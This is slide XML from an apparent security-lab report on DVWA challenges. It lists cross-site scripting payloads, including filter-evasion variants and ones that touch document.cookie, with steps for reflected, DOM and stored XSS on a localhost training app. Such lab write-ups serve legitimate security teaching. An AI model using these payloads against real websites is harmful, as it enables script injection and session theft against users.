    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="603303073"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:wheel spokes="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7579838-B401-4F87-95C8-B13B0D1816F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3656870" y="101639"/>
            <a:ext cx="4611775" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge 6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3AE2BCCE-CC67-451F-A9A3-A7E7D7A0EFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3656870" y="3429000"/>
            <a:ext cx="4611775" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228973" y="546239"/>
            <a:ext cx="5433763" cy="2863767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228973" y="3848104"/>
            <a:ext cx="5433763" cy="2821631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4068272600"/>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87579838-B401-4F87-95C8-B13B0D1816F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3656870" y="101639"/>
            <a:ext cx="4611775" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3AE2BCCE-CC67-451F-A9A3-A7E7D7A0EFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3656870" y="3429000"/>
            <a:ext cx="4611775" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of challenge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" u="sng" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228973" y="520743"/>
            <a:ext cx="5433763" cy="2908257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228973" y="3829110"/>
            <a:ext cx="5433763" cy="2924377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="567956919"/>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12D4710C-EBC2-4DA4-B54C-02587D2A1202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1056106" y="595061"/>
            <a:ext cx="10510252" cy="5180097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{748F4084-E37C-4AE0-A0C5-A311563B7BE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3954227" y="5970551"/>
            <a:ext cx="6183103" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0"/>
              <a:t>Successful completion of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>Leettime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t> Labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39764503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5421" y="1218969"/>
            <a:ext cx="10911625" cy="4339650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Vulnerable URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>localhost://dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=alert(1)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>hello&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>opttion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt;&lt;/select&gt;&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=alert("XSS")&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=”#” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=alert(1) &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>#&lt;/select&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=alert(1)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3850243" y="217799"/>
            <a:ext cx="2969531" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>DVWA LAB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2594363570"/>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00" y="458956"/>
            <a:ext cx="11031470" cy="6278642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0"/>
              <a:t>How to reproduce this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Vulnerability-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 1(Reflected XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>xss_r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Type any word in the name field and as it can be seen that it reflects the word, hence it has a vulnerability of reflected XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Now enter the payload 1 there and as it can be seen the alert box confirms the XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 1(DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>xss_d</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Press submit button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the default parameter to payload 1 and it will execute an alert confirming XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Challenge 1(Stored XSS):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>xss_s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Type any word in the name field and enter the payload 1 in the message field.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>As it can be seen the alert box confirms the XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1339346208"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">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AEB420D-8E62-4FD3-A3F9-39C0904D9300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="1491853"/>
            <a:ext cx="10096500" cy="4620605"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
